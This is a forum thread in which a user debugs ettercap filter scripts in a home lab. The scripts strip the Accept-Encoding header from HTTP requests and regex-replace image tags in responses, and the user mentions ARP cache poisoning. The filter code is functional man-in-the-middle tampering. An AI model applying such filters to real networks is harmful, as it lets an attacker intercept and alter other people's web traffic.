Results 1 to 5 of 5

Thread: ettercap + pcre_regex

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5

    Question ettercap + pcre_regex-filter vs own-plugin

    Hello everyone.

    I faced with problem of implementing regular expression filters in ettercap. My research start-point begin from IronGeeks post "Fun with Ettercap Filters". This is quite nice fun filter. It's work fine for my lab...

    Next step was improving it to replace not just:
    Code:
    <img src="image.png">
    <IMG SRC="image.png">
    but also:
    Code:
    <img id="32" class="cl1" src="image.png">
    To solve this I decide use:
    to find patterns: regex(where, regex)
    to replace patterns: pcre_regex(where, pcre_regex ... )

    Short (and unique) description for this functions I get from: man etterfilter and "Irongeek etterfilter man page"

    I'm not good in regular expressions, but after some reading I implement this regular expression:
    search pattern: /i/g(<img.*[^>]src=['|"])(.*[^'"])(['|"])
    replace pattern:$1NEWImage.png$3


    Using web-regular-expression-tester (for example regexter.com) I can successfully convert html.

    After all this stuff i decide rewrite filter described in article above, and now it looks like:
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	        msg(".");
       }
    }
    
    if (ip.proto == TCP && tcp.src == 80) { 
    
    	if (pcre_regex(DATA.data, "/i/g(<img.*[^>]src=['|\"])(.*[^'\"])(['|\"])", "$1tmp_image.png$3")){			msg("\n---> Perl regexp <---\n");		
    	} 
    	
    }
    But filter do not work...
    As I can see in log - ettercap say that this works fine
    Code:
    replace("Accept-Encoding", "Accept-Rubbish!");
    but
    Code:
    pcre_regex(DATA.data, "/i/g(<img.*[^>]src=['|\"])(.*[^'\"])(['|\"])", "$1tmp_image.png$3")
    just not found

    I will be very appreciated if you can help me!



    P.S.

    And last, but not least.
    My environmnet is:
    hp notebook: windows
    virtual box: last BT4 prefinal

    I'm using ettercamNG 0.7.3 and can successfully poison arp cash of my notebook

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5

    Default

    Ok.
    Seems to be I'm only one with such idiotic thoughts about filtering...
    Nevertheless as I can't debug filter i think about writing own plugin. I read some articles about writing plugins, and try to compile dummyplugin, but in BT4 distro I can't find source files, then I try search ettercap-dev (- source and etc) in repositories but I was enable to find thus I download them from official web site...
    After unpacking source files i use plugin sources to compile plugins and i gained success, but when I try to use compiled dummypulgin in ettercanNG wich is supplied with BT4 it crashes...

    So, if anyone can tell me how where I can find BT4 ettercapNG source files I will be appreciated!

  3. #3
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by Falcon(TFSoft) View Post
    Ok.
    Seems to be I'm only one with such idiotic thoughts about filtering...
    Try cutting your regex back.
    Code:
    <img.[^>]*src=.[^>]*>
    Start with a simple one and bring it further up. That one will do your bog standard replacement, but it shouldn't matter where the src tag is. After that works you can start on the simple $1 replacements to adjust size etc.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  4. #4
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5

    Unhappy

    Sorry for late post back, and thx for replay!

    So, I replace filter and it looks no like:

    Code:
    # Ask server not Encoding packets
    if (ip.proto == TCP && tcp.dst == 80) {
    	if (search(DATA.data, "Accept-Encoding")) {
    		replace("Accept-Encoding", "Accept-Rubbish!"); 
    		msg("<< Drop encoding \n");
    	}
    }
    
    # Replace Image
    if (ip.proto == TCP && tcp.src == 80) { 		
    	if (pcre_regex(DATA.data, "<img")) {
    		log(DATA.data, "/tmp/before.log");		
    		pcre_regex(DATA.data, "<img.[^>]*src=.[^>]*>", "nothing");
    		log(DATA.data, "/tmp/after.log");		
    		msg(">> image replace \n");
    	}
    }
    So, and as i can understand using it I will replace:
    Code:
    ... some html head body tags ...
    <img src='graphics/rate_star.png'></img>	
    ... some closepup html head body tags ...
    to this:
    Code:
    ... some html head body tags ...
    nothing</img>	
    ... some closepup html head body tags ...
    But in practice I face with other results:
    1) page loading take extra long time
    2) page content was only one word "nothing"

    p.s.
    my debug logs contain such data:
    /tmp/before.log
    Code:
    HTTP/1.0 200 OK
    Date: Tue, 26 Jan 2010 22:11:42 GMT
    Server: Apache
    Last-Modified: Tue, 26 Jan 2010 22:11:34 GMT
    ETag: "21735e-b7-47e18919ad180"
    Accept-Ranges: bytes
    Content-Length: 183
    Content-Type: text/html
    X-Cache: MISS from server.org
    X-Cache-Lookup: HIT from server.org:8080
    Via: 1.0 server.org:8080 (squid)
    Connection: keep-alive
    
    ... some html head body tags ...
    <img src='graphics/rate_star.png'></img>	
    ... some closepup html head body tags ...
    /tmp/after.log

    Code:
    nothing
    p.p.s.
    Sorry for this mess html-replcae-strings but i cant post lins

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    5

    Question

    May be move this posts to developers node? or recreate it there?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •